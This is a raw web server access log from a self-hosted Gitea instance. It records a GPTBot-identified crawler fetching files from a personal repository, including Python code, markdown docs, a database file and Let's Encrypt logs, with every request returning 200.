Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" -[17/Feb/2026:13:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" -[17/Feb/2026:13:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" -[17/Feb/2026:13:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" -[17/Feb/2026:13:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" -[17/Feb/2026:13:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 9941] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" -[17/Feb/2026:13:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" -[17/Feb/2026:13:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" -[17/Feb/2026:13:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" -[17/Feb/2026:13:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 22473] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" -[17/Feb/2026:13:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" -[17/Feb/2026:13:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 22473] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" -[17/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" -[17/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" -[17/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" -[17/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" -[17/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" -[17/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" -[17/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" -[17/Feb/2026:13:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" -[17/Feb/2026:13:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:13:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" -[17/Feb/2026:13:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10965] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10927] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33591] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31256] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31284] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38720] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" -[17/Feb/2026:13:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" -[17/Feb/2026:13:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33427] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23691] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33396] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33620] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35798] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10957] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38750] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23717] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 